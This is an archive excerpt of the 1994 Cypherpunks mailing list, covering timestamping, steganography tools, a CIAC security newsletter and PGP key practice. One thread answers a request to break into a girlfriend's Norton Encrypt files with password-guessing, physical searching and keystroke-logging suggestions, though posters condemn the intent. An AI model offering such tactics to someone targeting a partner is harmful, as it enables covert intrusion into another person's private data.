M7yq1fxjETKxCxKSNiWa1jB/AofVkuPF2j5PT+sNZtDflyz5ZrOKYBjJZvMKRE+p li3LO0TSlICXwNlOmwaFx09xabi0LjVbh+xUXnr75XcGTpQSttOu9Q== =cJ1M -----END PGP SIGNATURE----- From blancw at pylon.com Fri Dec 23 03:31:52 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Fri, 23 Dec 94 03:31:52 PST Subject: Breaking into girlfriend's files Message-ID: <199412231132.DAA06182@deepthought.pylon.com> Responding to msg by Mark Terka, who is having a bad crypto day: I don't recall seeing too much in the waqy of condemnation of the guy that posted RC4 to this list ..... but as soon as we see something that touches close to home like male/female relationships, the shit hits the fan!!!!! ............................................................ Don't you distinguish between the evil that governments can do, and the evil that female opponents in relationships (of dubious merit) can achieve? Are you proposing that some people make it a policy to cheat on their friends, just as some governments do, and should be dealt with in like manner, automatically and without further consideration? It were a wise & just government, which could not distinguish between the good, the bad, and the all rest. And who appointed you the list censor, anyway? If it makes sense that a cypherpunk could provide instructions for breaking a password, it also makes sense that they could choose to withhold it. After all, if they are smart enough to know how to do this, they should also be capable of making a reasoned decision about when it might be reprehensible - with or without your approval. .. Blanc From eric at remailer.net Fri Dec 23 08:10:10 1994 From: eric at remailer.net (Eric Hughes) Date: Fri, 23 Dec 94 08:10:10 PST Subject: SSL server experiment In-Reply-To: <9412221854.AA10294@warp.mcom.com> Message-ID: <199412231707.JAA19961@largo.remailer.net> From: kipp at warp.mcom.com (Kipp E.B. Hickman) The 1.1 version of server&client will support 128 bit stuff...The 128 bit client will not be available for ftp though...bloody export laws How will the 128 bit client be available? Eric From jya at pipeline.com Fri Dec 23 08:30:48 1994 From: jya at pipeline.com (John Young) Date: Fri, 23 Dec 94 08:30:48 PST Subject: NYT Correction on Sonofusion Message-ID: <199412231630.LAA02234@pipe1.pipeline.com> Correction today: "A headline in Science Times on Tuesday about attempts to create thermonuclear fusion by aiming sound waves at microscopic bubbles misstated the process involved. It is high-temperature fusion, not cold fusion." Note: The NYT advertises an email address for "comments on published articles about science and suggestions for coverage": From eric at remailer.net Fri Dec 23 08:39:03 1994 From: eric at remailer.net (Eric Hughes) Date: Fri, 23 Dec 94 08:39:03 PST Subject: Making sure a program gets to the receiver intact In-Reply-To: <9412220711.AA21268@anon.penet.fi> Message-ID: <199412231736.JAA20003@largo.remailer.net> From: an169306 at anon.penet.fi How can I insure a program, once put on FTP sites stays untampered with? The best solution is not digital signatures but rather digital timestamping. The question is not persistence of authorship but rather persistence through time. Digital timestamping is not keyed. The Haber-Stornetta algorithm uses only one way functions. The certificate the timestamping algorithm spits out gives a way of verifying that the modification state (yes/no) is the same as that of the timestamping root, shared by many participants. The assumption is that spoofing the root of the timestamp system is hard, exactly because it is shared widely. The initial system published the root in the NYT announcements section. Since then, Haber and Stornetta have started Surety Technology, which is commercializing the patent. Their new system doesn't have a single point of failure at the root, it appears, but I don't know details. The problem of detecting modification is not the same problem as assuring that version one was written by the same author as version two. The asker of the original question said nothing of versioning. The question applies to first versions as well, where persistence of identity is not at issue. Digital signatures will work to affix a pattern of bits, but as with digital signatures, if the key is modified, so might be the signature. Yet digital signatures require private keys, which do persist through time, and so there is an issue of forward security. The private key, if compromised, might be used to sign a statement that the signature on the binary was a forgery! With digital timestamping, no keying information exists to be compromised, so the affixation of bit pattern is permanent. The holes: 1: Someone hacking the keyservers, substituting a key for all the people who signed, and modifing the archive to show that. 2: Someone breaking into my apt, sticking a keyboard monitor on, getting my passphrase and key. This is all a problem of economics. What is it worth to compromise the binary? How much does it cost to perform the compromises? In fact the real problem is deeper. The binary, public key, and signatures can simply be entirely replicated. Now a person trying to distinguish between one binary/key/sig triple from the other must rely upon some social process to distinguish, which is not much different than the original problem of distinguishing two binaries claiming to be the same thing. This is where digital timestamping shines. The timestamp algorithm yields time ordering of the various binaries. Now the discrimination problem between binaries can be resolved by choosing the _earlier_ one. We assume that the spoofer has only access to the public version in order to create an alteration. Note that this solution doesn't protect against an insider publishing a modified version before the actual release. This is not to say that binaries shouldn't be signed. A common trojan horse attack on binaries is to release "bug-fix" versions. It is in this situation that the persistence of identity of authorship is important. Eric From eric at remailer.net Fri Dec 23 08:43:23 1994 From: eric at remailer.net (Eric Hughes) Date: Fri, 23 Dec 94 08:43:23 PST Subject: Is it possible to break Norton Encrypt?? In-Reply-To: <941222003135.20215af5@SCSUD.CTSTATEU.EDU> Message-ID: <199412231740.JAA20016@largo.remailer.net> From: "ADAM GERSTEIN, _THE_ MACGURU" All this moralizing about the issue of breaking someone else's encrypted files seems to mask one important question: Does anybody here know jack about Norton Encrypt? Eric From John.Schofield at sprawl.expressnet.org Fri Dec 23 09:38:11 1994 From: John.Schofield at sprawl.expressnet.org (John Schofield) Date: Fri, 23 Dec 94 09:38:11 PST Subject: Steganography Software Message-ID: <5b3_9412230001@expressnet.org> -----BEGIN PGP SIGNED MESSAGE----- I am working on a review of the various steganography programs out there for the March/April issue of Keep Out magazine. I have a pretty good list of the stuff that's available in the DOS world, but I may have missed plenty of stuff available on the Internet. If anyone is aware of later versions of these programs, or of a program not listed here that should be, *please* let me know. (Please include an FTP site and directory and/or a BBS to download it from.) I want this review to be as complete and accurate as possible. Questions, comments, and suggestions are of course welcome. Here's everything I have so far, including partial descriptions: HDSK41.ZIP Hide and Seek v 4.1b. Data hiding/seeking using GIF files. JSTEGV4.ZIP This version of the Independent JPEG Group's JPEG Software (release 4) has been modifed for 1-bit steganography in JFIF output files. MANDLEXE.ZIP MandelSteg V1.0, including GIFExtract V.10, for DOS. These two programs allow you to hide confidential data in fractal GIF images. PGE10B.ZIP Pretty Good Envelope (P.G.E.) v1.0. PGE will "insert" your data into a GIF or JPG file. S-TOOLS.ZIP S-Tools for Windows. Version 2.00. Steganography program for Windows. S-Tools (Steganography Tools) brings you the capability of `hiding' files within Windows sound files (.WAV), bitmap (.BMP) and CompuServe GIF files. STEGO.ZIP Send encrypted messages and files which are undetectible and REQUIRE NO KEY! Programs and messages are submerged into a graphic file (usually a B/W TIF file). Once the object has been hidden the TIF appears unchanged. STEGODOS.ZIP StegoDos aka Black Wolf's Picture Encoder, Version 0.90b. For 320x200x256 only. WNS210.ZIP White Noise Storm: Data Encryption/Steganography package. You can use this to hide files in PCX pictures so nobody will see them. Thanks very much! John Schofield Publisher, Keep Out -----BEGIN PGP SIGNATURE----- Version: 2.7 Comment: Call 818-345-8640 voice for info on Keep Out magazine. iQCVAwUBLvp8M2j9fvT+ukJdAQHDkgP/Uh9aEhOz4Gu7FnUbFOTaOLAmlJBSRgjG 5nFRkWudlKejB/89tXFV64mg+iCPpkF9OJg1+szkzskPmRXmJ+K6WafBxlEAD9Tp I+vI/QAxQDT8XCn9e4fQ0QaEfp/Ek9GBZ2qSJvq6wbJmBM/iuLfHukEI7l9uSp/K KhAM9nnqbo8= =P+mn -----END PGP SIGNATURE----- **EZ-PGP v1.07 ... I thought about being born again, but mum said no. --- Blue Wave/RA v2.12 -- |Expressnet: John Schofield 11:310/12 |Internet: John.Schofield at sprawl.expressnet.org | | Standard disclaimer: The views of this user are strictly his own. From jdwilson at gold.chem.hawaii.edu Fri Dec 23 09:54:29 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Fri, 23 Dec 94 09:54:29 PST Subject: CIAC Notes 94-05 (fwd) Message-ID: <199412231759.MAA13801@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- I checked my mail and didn't find this posted to the list, so I'll send an abbreviated snip w/pointers for you. Interesting info... - -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - ---------- Forwarded message ---------- Date: Thu, 22 Dec 1994 16:30:38 -0800 From: VANLEHN at margay.llnl.gov To: jdwilson at gold.chem.hawaii.edu Subject: CIAC Notes 94-05 U.S. DOE's Computer Incident Advisory Capability ___ __ __ _ ___ __ __ __ __ __ / | /_\ / |\ | / \ | |_ /_ \___ __|__ / \ \___ | \| \__/ | |__ __/ Number 94-05 December 22, 1994 Welcome to the fifth issue of CIAC Notes, the United States Department of Energy's (DOE) Computer Incident Advisory Capability (CIAC) electronic publication for articles on relevant computer security topics. This "E-zine" is a service requested by our DOE and DOE contractor customers, and is open to subscription by anyone who can receive E-mail via the Internet. Hopefully we are giving you a gift of information to close out 1994. If you have topics you would like addressed or have feedback on this issue, please contact the editor, Allan L. Van Lehn, CIAC, (510) 422-8193 or send E-mail to ciac at llnl.gov. $-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$ $ Reference to any specific commercial product does not necessarily $ $ constitute or imply its endorsement, recommendation or favoring by $ $ CIAC, the University of California, or the United States Government.$ $-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$ TABLE OF CONTENTS Feature Articles How Trusting Can We Be? Internet Firewalls - Part 2 More On The Good Times Virus Hoax CIAC Plans To Have A Home Page In January Security Information Servers MAC / PC User PowerMAC Users Beware Data Physician Plus! 4.0E Available Novell Users OS/2 Systems Processing CLASSIFIED DATA CIAC Information Who Is CIAC? CIAC Bulletins Issued Recently Subscribing To CIAC Electronic Publications Accessing CIAC's Electronic Information Servers Publications Available From CIAC Contacting CIAC /snip/ >It is possible >to create a file that remaps keys when displayed on a PC/MS-DOS machine with >the ANSI.SYS driver loaded. However, this only works on PC/MS-DOS machines >with the text displayed on the screen in text mode. It would not work in >Windows or in most text editors or mailers. A key could be remapped to >produce any command sequence when pressed, for example DEL or FORMAT. >However, the command is not issued until the remapped key is pressed and the >command issued by the remapped key would be visible on the screen. You could >protect yourself by removing ANSI.SYS from the CONFIG.SYS file, but many DOS >programs use the functionality of ANSI.SYS to control screen functions and >colors. Windows programs are not effected by ANSI.SYS, though a DOS program >running in Windows would be. - ------------------------------ Security Information Servers Novell: http://www.novell.com/cgi-bin/ftpsearch.pl?QString=security Microsoft Windows: gopher://198.105.232.4:70/77%5Ckb%5Cperopsys%5Cwindows%5Cwindows.src?security gopher://198.105.232.4:70/77%5Ckb%5Cperopsys%5Cwindows%5Cwindows.src?patches FIRST's WWW server: http://www.first.org/first/ NIST/CSRC http://cs-www.ncsl.nist.gov Purdue Computer Emergency Response Team (PCERT) http://www.cs.purdue.edu/pcert/pcert.html NASA Automated Systems Incident Response Capability (NASIRC) (this is accessible to *.nasa.gov systems only, but it can be accessed though the FIRST server or you can contact NASIRC to be added to their hosts.allow file) http://nasirc.nasa.gov/NASIRC_home.html Naval Computer Incident Response Team (NAVCIRT) http://infosec.nosc.mil/niseeast/navcirt.html Australian Computer Emergency Response Team (AUSCERT) http://www.auscert.org.au (Proposed to be up in a couple of weeks) http://www.uq.oz.au/pcc/services/sert/home.html (Currently active) DFN-CERT German Home Page - http://www.cert.dfn.de/ English Home Page - http://www.cert.dfn.de/eng/ Computer Emergency Response Team (CERT) http://www.sei.cmu.edu/SEI/programs/cert.html Veterans Health Administration (VHA) http://www.va.gov Small Business Administration (SBA) http://www.sbaonline.gov/ If you know of others, please send mail to ciac at llnl.gov. /snip/ - ------------------------------ Data Physician Plus! 4.0E Available All DOE sites should now have Data Physician Plus! 4.0E for use on IMBpc compatable systems. Contact your site CPPM if you have not obtained an update. This version does provide protection from the KAOS4 and One_half viruses (see CIAC Bulletin E-32 for further information on KAOS4 and E-34 for information on One_half). - ------------------------------ Novell NetWare Users CIAC is receiving more and more calls from our DOE clients asking for information on minimizing the risks associated with installing NetWare and in further connecting these LANs to the Internet. To supplement our own experiences CIAC is interested in partnering with other experts to create a comprehensive package of information that could be made available to all sites. If you have Novell NetWare expertise and would like to be a CIAC associate, please send a note to ciac at llnl.gov. - ------------------------------ OS/2 Systems Processing CLASSIFIED DATA by Rollo D. Rogers [rogers at cod.nosc.mil] SECURITY SAFEGUARDS FOR PROCESSING CLASSIFIED INFO ON A COMPUTER RUNNING OS/2 V2.1 [note: some sites may not allow internal hard disks for classified systems. ed] - ------------------------------ CIAC INFORMATION - ------------------------------ Who is CIAC? CIAC is the U.S. Department of Energy's Computer Incident Advisory Capability. Established in 1989, shortly after the Internet Worm, CIAC provides various computer security services free of charge to employees and contractors of the DOE, such as: o Incident Handling Consulting o Computer Security Information o On-site Workshops CIAC is located at Lawrence Livermore National Laboratory in Livermore, California, and is a part of its Computer Security Technology Center. CIAC is also a founding member of FIRST, the Forum of Incident Response and Security Teams, a global organization established to foster cooperation and coordination among computer security teams worldwide. Further information can be found at http://www.first.org/first/ - ------------------------------ CIAC Bulletins Issued recently CIAC issues two categories of computer security announcements: the information bulletin and the advisory notice. Information bulletins describe security vulnerabilities and recommend countermeasures. Advisory notices are more imperative, urging prompt action for actively exploited vulnerabilities. Advisory notices are delivered as quickly as possible via E-mail and FAX. F-01 Advisory SGI IRIX serial_ports Vulnerability Oct. 4, 1994, 1600 PDT F-02 Bulletin Summary of HP Security Bulletins Nov. 17, 1994, 1300 PDT F-03 Bulletin Restricted Distribution F-04 Bulletin Security Vulnerabilities in DECnet/OSI for OpenVMS Nov. 28, 1994, 0900 PDT F-05 Bulletin SCO Unix at, login, prwarn, sadc, and pt_chmod Patches Available Dec. 06, 1994, 0800 PDT F-06 Bulletin Novell UnixWare sadc, urestore, and suic_exec Vulnerabilities Dec. 14, 1994, 0800 PDT - ------------------------------ Contacting CIAC DOE and DOE contractor sites that require additional assistance or wish to report a vulnerability: call CIAC at 510-422-8193, fax messages to 510-423-8002 or send E-mail to ciac at llnl.gov. ------------------- A - T - T - E - N - T - I - O - N --------------------- | For emergencies and off-hour assistance, CIAC is available 24-hours a day | | to DOE and DOE contractors via an integrated voicemail and SKYPAGE number.| | To use this service, dial 1-510-422-8193 or 1-800-759-7243 (SKYPAGE). The | | primary SKYPAGE PIN number, 8550070 is for the CIAC duty person. A second | | PIN, 8550074 is for the CIAC Project Leader. Keep these numbers handy. | --------------------------------------------------------------------------- - ------------------------------ CIAC's Electronic Publications Previous CIAC Bulletins and other information are available via anonymous FTP from ciac.llnl.gov. CIAC has several self-subscribing mailing lists for electronic publications: 1. CIAC-BULLETIN for Advisories, highest priority -time critical information and Bulletins, important computer security information; 2. CIAC-NOTES for Notes, a collection of computer security articles; 3. SPI-ANNOUNCE for official news about Security Profile Inspector (SPI) software updates, new features, distribution and availability; 4. SPI-NOTES, for discussion of problems and solutions regarding the use of SPI products. Our mailing lists are managed by a public domain software package called ListProcessor, which ignores E-mail header subject lines. To subscribe (add yourself) to one of our mailing lists, send requests of the following form: subscribe list-name LastName, FirstName PhoneNumber as the E-mail message body, substituting CIAC-BULLETIN, CIAC-NOTES, SPI-ANNOUNCE or SPI-NOTES for list-name and valid information for LastName FirstName and PhoneNumber. Send to: ciac-listproc at llnl.gov (not to: ciac at llnl.gov) e.g., subscribe ciac-notes O'Hara, Scarlett W. 404-555-1212 x36 subscribe ciac-bulletin O'Hara, Scarlett W. 404-555-1212 x36 You will receive an acknowledgment containing address, initial PIN, and information on how to change either of them, cancel your subscription, or get help. To subscribe an address which is a distribution list, first subscribe the person responsible for your distribution list. You will receive an acknowledgment (as described above). Change the address to the distribution list by sending a second E-mail request. As the body of this message, send the following request, substituting valid information for list-name, PIN, and address of the distribution list:. Send E-mail to ciac-listproc at llnl.gov: set list-name address PIN distribution_list_address e.g., set ciac-notes address 001860 rE-mailer at tara.georgia.orb To be removed from this mailing list, send the following request: unsubscribe list-name For more information, send the following request: help If you have any questions about this list, you may contact the list's owner: listmanager at cheetah.llnl.gov. - ------------------------------ Accessing CIAC's Electronic Information Servers CIAC operates a security information server for anonymous FTP at ciac.llnl.gov which contains all of the publicly available CIAC, CERT/cc, NIST, and DDN bulletins, virus descriptions, the virus-l moderated virus bulletin board, copies of public domain and shareware virus detection/protection software, copies of useful public domain and shareware utility programs, and patch files for some operating systems. Use FTP to access it either by name or IP address (128.115.19.53). The operation and prompt will depend on which vendor's FTP you are running. Usually, you must first log in before you can list directory contents and transfer files. Use "FTP" or "anonymous" for Name or Foreign username unless given a general prompt such as ciac.llnl.gov> or FTP>. In that case, enter the keyword "user" or "login" before "FTP" or "anonymous" (e.g., user FTP). Use your Internet E-mail address for the Password. Once logged in you may type a question mark to find out what key-words are recognized. The file 0-index.txt (in the top level directory /FTP) is a document explaining the directory structure for downloadable files. The file whatsnew.txt (in directory /FTP/pub/ciac) contains a list of the new files placed in the archive. Use the command get [for single files] or mget [for multiple files] to download one or more files to your own machine. - ------------------------------ Publications Available from CIAC CIAC prepares publications on a variety of computer security related topics, the CIAC 2300 series. Many of these will be updated as needed to keep the information current. We welcome suggestions for topics that you feel would be valuable. We also make available some documents from other sources. In the table below, column E is for electronic documents available via CIAC's servers (see above). Column P is for printed documents, for those who do not have Internet or telephone-modem access. If neither column is checked, the document is soon to be released. The electronic formats are: *.txt for ASCII, *.ps for PostScript(tm), *.hqx for bin-hexed Microsoft Word, *.wp5 for PC Word Perfect v5.0. No. E P TITLE 2300 x x Abstracts of the CIAC-2300 Series Documents 2301 x x Computer Virus Information Update 2302 Accessing The CIAC Computer Security Archives 2303 x x The Console Password Feature for DEC Workstations 2304 Data Security Vulnerabilities of Facsimile Machines and Digital Copiers 2305 Unix Incident Guide: How To Detect A Unix Intrusion 2308 Securing Internet Information Servers CIAC x Incident Handling Guidelines LLNL x User Accountability Statement, E. Eugene Schultz, Jr. SRI x Improving the Security of your Unix System, David A. Curry LLNL x Incident Handling Primer, Russell L. Brand ORNL x Terminal Servers and Network Security, Curtis E. Bemis & Lynn Hyman To obtain further information, contact Allan L. Van Lehn, CIAC, 510-422-8193 or send E-mail to ciac at llnl.gov. - ------------------------------ This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes. - ------------------------------ End of CIAC Notes Number 94-05 94_12_22 **************************************** - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvsP8CoZzwIn1bdtAQFmbgGAve2RmZmmVy+AtvHhLtdKBy/B5/7eyNDe h+eaysT6l7JUIX1x18BwM574UH+ibzYB =BnIF -----END PGP SIGNATURE----- From foodie at netcom.com Fri Dec 23 10:20:58 1994 From: foodie at netcom.com (Jamie Lawrence) Date: Fri, 23 Dec 94 10:20:58 PST Subject: Is it possible to break Norton Encrypt?? Message-ID: Bear with me, all. I am on my first cup of coffee. At 9:40 AM 12/23/94, Eric Hughes wrote: >Does anybody here know jack about Norton Encrypt? Well, I do have qualms about this, but I am assuming/hoping the original poster doesn't know what they are doing and wanted an answer like "Look in resource #164, dood" (call me a bleeding heart). Norton Encrypt for the Mac does have major problems. Key handling is botched such that the keyspace is significantly less than the full 56 bits specified, through what looks like a combination of inept implementation and perhaps outright bugs. I don't remember all the details, but I think NE converts to all lower case or some such, and discards anything past 8 characters of passphrase. There is a file on one of the crypto sites about NE. I would direct anyone interested to dig around some. -j, whose next pasttime this morning is helping con artists swindle old folks. >Eric -- On the internet, nobody knows you're a deity. __________________________________________________________ foodie at netcom.com From rishab at dxm.ernet.in Fri Dec 23 10:53:13 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Fri, 23 Dec 94 10:53:13 PST Subject: Attacking Norton Encrypt Message-ID: Regarding the simple question about Norton Encrypt's security (and ignoring the alt.relationship-counsellor interlude), I believe Norton uses DES (for 'maximum security' or a 'fast proprietary' method for convenience. I don't think it has the usual errors (password stored in ciphertext etc), but a brute force attack on DES is beyond the means of most Norton users IAC. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From mab at research.att.com Fri Dec 23 11:01:41 1994 From: mab at research.att.com (Matt Blaze) Date: Fri, 23 Dec 94 11:01:41 PST Subject: export adventure Message-ID: <9412231901.AA03863@merckx.info.att.com> Some of you may recall that about a month ago I posted the long and tortured story of my efforts to obtain a tempory export license for a so-called "exportable" telephone security device. I promised to report on what actually happened when I tried to go in and out of the country with the thing. Well, I just got back. I'm in the process of writing up the details, and I'll post a full account in the next few days, but the bottom line is that I've come to the conclusion that Kafka must have been trying to export something under one of these licenses when he wrote "The Trial". (Nothing bad happened, mind you, just a twistied maze of essential bureaucratic processes each more arcane than the last and all well beyond the grasp of humble travelers such as I). -matt From blane at seanet.com Fri Dec 23 12:21:20 1994 From: blane at seanet.com (Brian Lane) Date: Fri, 23 Dec 94 12:21:20 PST Subject: Attacking Norton Encrypt In-Reply-To: Message-ID: On Fri, 23 Dec 1994 rishab at dxm.ernet.in wrote: > > Regarding the simple question about Norton Encrypt's security (and ignoring > the alt.relationship-counsellor interlude), I believe Norton uses DES (for > 'maximum security' or a 'fast proprietary' method for convenience. I don't > think it has the usual errors (password stored in ciphertext etc), but a > brute force attack on DES is beyond the means of most Norton users IAC. Pardon me if someone else mentioned this(I just re-subscribed to the list). If the person in question really wants to read his GF's private files his best be would be to guess passwords, toss her purse/diary for the password written down, and all the other basic physical attacks available to him. Moral note: If he feels that this is necessary then this is definatly a relationship that should not continue(for her sake). Brian ------------------------------------------------------------------------------ "Everyone is a prisoner holding their own key." | finger blane at seanet.com -- Journey | PGP 2.6 email accepted ------------------------------------------------------------------------------ From mab at research.att.com Fri Dec 23 12:25:24 1994 From: mab at research.att.com (Matt Blaze) Date: Fri, 23 Dec 94 12:25:24 PST Subject: Why I have a 512 bit PGP key Message-ID: <9412232025.AA03925@merckx.info.att.com> A while back, I generated a PGP key pair for use on my machine at work, a Sun SparcStation sitting on the reasonably-well-protected- from-outside-attack AT&T internal research network. I selected a key length of 512 bits. My number theory friends tell me that this is weak by modern standards; cracking my key would probably require within an order of magnitude of the total computational effort expended in the recent attack on RSA-129. I even volunteered my key as a ``target'' for the next such attack. Still, I'm happy with my choice, or rather, I've got so many other security things to worry about that compromise of my private mail based on cryptanalysis of my dinky little public key to obtain my private key is the last thing on my mind. In fact, I kind of like it that my key doesn't advertise pretensions of high theoretical security when, in fact, there is very little at all in practice. The first problem, of course, is secret storage. Modern networked computers are awful at storing secrets. (This, after all, is one of the problems that crypto software like PGP aims to solve). I suspect my situation is reasonably typical, if not better than most. My computer at work sits on my desk (in my locked office), has its own local disk, only I know the root password, I try to keep up with the latest security patches, and I keep most of my files in encrypted form under CFS. I'm the only regular user of my workstation, and while I'm at work I access it directly from the console. The network to which it is attached is AT&T's ``R&D Internet'', the same one that sits behind the firewall described in Cheswick and Bellovin's great new book. I probably have at least average system administration and general computer security skills, and I'm reasonably good about practicing what I preach. Sounds like a pretty secure machine from which to run PGP, right? I don't think so. While my machine's operating system is pretty self-sufficient, my own home directory sits on a remote file server administered by people who are good at and have time to perform essential services for me like taking backups. This means that, no matter how hard I try, it's impossible for me to be sure that none of my files have been tampered with. We use off-the-shelf NFS, which means that for all practical purposes anyone with access inside the firewall (that's about 50k people in my case) can replace any of my files. Furthermore, even though my office has a lock, I'm not the only person in the world with the key (Bell Labs escrows office keys, after all), and I've managed to pick the lock once or twice on days when I left my key at home. I really have no idea where my machine has been or what software I'm typing at when I run PGP. So where should I store my private key? Well, I could, as some have suggested, keep it on a floppy disk that I carry around with me everywhere I go, but first of all, that's too inconvenient. It also sounds dangerous in practice. A floppy disk is about the size of a US passport, and I've already lost two of those. That means I'd have to replicate the key somehow anyway, so I might as well rely on the reasonably well established backup procedure that protects me from loss of the rest of the files in my home directory. For all practical purposes, I have to assume that my secret key file is public. That leaves the passphrase to protect the secret key. According to Shannon, English text contains just over 1 bit per letter of real information. Even if we assume twice that to account for the added twists and turns of phrase I'm inclined to add to a passphrase, I just can't remember (or type) a phrase with anywhere near enough entropy to approach the level needed to do justice to even a little 512 bit RSA key. I think the simplest cryptanalytic attack against me would be to go after the passphrase-based encryption of the secret key file. (You'd need a way to enumerate the most likely keys based on a hashed passphrase, which is a problem not yet well studied in the unclassified literature. I suspect a solution not out of reach of a determined adversary, however). An even simpler attack would be to break in to my machine and replace my copy of PGP (or my kernel, or my shell, or whatever) with one that records the passphrase as I type it. (No, I don't leave this as an exercise to the reader!) The next problem is with PGP itself. While I haven't looked carefully, it seems to be a well-engineered program, and it has a number of design features that I admire. However, I think the basic model it implements sits at two high a level, making it inherently unreliable for really sensitive traffic. It's just too hard to use. (Most of the problems could be fixed by pushing things to a lower level, and I understand a number of people are working on this). In particular, I'm have to have too much involvement in each PGP operation, and it's just too easy for me to do stupid things like: - encrypting messages with the wrong public key - sending the cleartext file instead of the ciphertext file - leaving the cleartext file around in an unprotected file system - including the passphrase in the message (especially when your fingers are so used to typing it all the time...) - forgetting to use PGP at all - typing a passphrase over a network connection (especially easy when you've got several windows open on several machines). Systems that use hardware keys (smartcards, etc) are less vulnerable to this I've done each of these dumb things at least once, and probably others too. Don't get me wrong - I advocate the use of strong encryption as much as the next nerd. I'm just concerned about focusing so narrowly that we lose sight of the larger security picture. Perry Metzger once made reference to cryptographic "size queens" who worry about key size and nothing else - it's a phrase that rings true. There's something to be said for systems that chose their security parameters provide about the same strength everywhere. DES is a good example - a 128 bit key DES could be made that is no less secure than the current 56 bit version - by a few bits. The engineering triumph is that the "advertised" DES security parameter - the key size - tells close to the truth about the overall security of the system. (Of course, in RSA-based systems, there's an added variable - advances in factoring - that may make it prudent to include a significant margin for error, especially for keys that must retain their strength over time). I have a 1024 bit key at home. -matt -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.1 mQBNAitm4zgAAAECANYaL7K5Ca5B4Sq3udKKkFasQNrgfKGoWRUjwB/10lAFVrhN aKz/b6iJXFxZ6g+YlCvdQTu/EUO6JkBihshIRgEABRG0D21hYkBiaWcuYXR0LmNv bbQhbWF0dCBibGF6ZSA8bWFiQHJlc2VhcmNoLmF0dC5jb20+iQCVAgUQLIG7Ga1S SlGFGX+1AQEt7QQAtwhDbN/799e763LrbhB5ItoR1r2ud+nWBZi0S64OVnVkLjnd zVwMouPiaiEs/ORWQfoVPmME6fMYlUeh+uLonSDymjzosWyU6yJRs8lcAy2MMBR+ De00mHk8+nDAuY0j4udH2oqvd6V6IEgsN8bQeme8CkNj3uULmzNMrYtns7aJAJUC BRAr3LtEs25wSZyVhQ8BAXQwA/wIxBaxEM/DER96N6o00qzzJog8nbKGH2S4achc P0/96N9FXgnnoKybARfG+ZfliuuMRyt40MIkg1/Z5PzLg0m5dVzXgkYv7B98bI+8 dVuzENJRzBbbmSDemcTaF2KWdtW7U66xFSP6S86RDOuQHzg6uCi2tmoJhvdWroWz VVxGj4kAlQIFECtzeqp9h9s63RlgUQEB8UoD/ilKx2sUFzQwkM3DSRQZun5FoR1N ujmt710NHkn3BFcRcBAU1o6VEHg0MlQXYEDk16YnhUEZDy0QuMrxXWcLee1UP2jl k0+ezNP5NMsSMt7HVjGJ+xi+exc6+Clyl/WjSEhpears1kBWAI12eVbO1uI/uGr5 vksZqkPoT8a1WaumiQCNAgUQK21uiULwpfyXKdSbAQFErAO/TsSmabCpT4Uzi/zQ 14yBiDqwatj8mhaE60nG8wiqQv4W4hmDXjrxGRr0LQNM3eBLCkoEpKIDmL1RuwtB Z4AUsqoJTC2Yq46KnSznfqgY0F+C4kSptxo0p1KJ79FKFlW9dyTKVBB1WOBzbsw1 Kx/oog+DmUH0VIbYiQCVAgUQK21W3FTdX6I8ZiRnAQHErAP+P+WalKGRrgM/v8pp o4YKYmXxjsLUx89WJXMkxkoSzB7/ny7ITHo9i42qR+aXlsa+gqxdwRDrpI6k9FFF AhZ8s/bdZKpnXOJOjaj4P5LRbYem2VOZ8e9omXhHfz7a7NRUTimLA/q6lphy3Ulp byrua5Q8BkzQzI3RgbKEPshuOjeJAJUCBRArZuU6hr7UV33/hTMBATvGA/42wy/x BEVb5bOQiFTpEuB80Df53zt+b4TmfeueMMiDvvj7A5joLk7X/7x6HaBxHN/thbd6 S9NncWJfvy/PMnsQEmKarn45kwn/2xxDu2Po7pUN6Uj9DyA9uY+ilzqfk7ZA3RwH cbZA0Qv6LDNbapJXgFANwOC1tRB6yLtSG3T0iw== =V30c -----END PGP PUBLIC KEY BLOCK----- From perry at imsi.com Fri Dec 23 12:26:35 1994 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 23 Dec 94 12:26:35 PST Subject: reading someone's files Message-ID: <9412232026.AA22580@webster.imsi.com> Re: The Norton Encryption thread I'm suprised that no one has given the obvious answers on this topic. If you have physical access to someone's machine, it is trivial to find out what their encryption keys are. After all, the victim types into the machine regularly -- recording all their keystrokes is not a difficult matter at all. Now, I agree with all the people who note that violating people's privacy is wrong and that this individual should get a new girlfriend rather than learning how to hack her files, but from a technical point of view there is no challenge here at all. Perry From mab at research.att.com Fri Dec 23 12:38:05 1994 From: mab at research.att.com (Matt Blaze) Date: 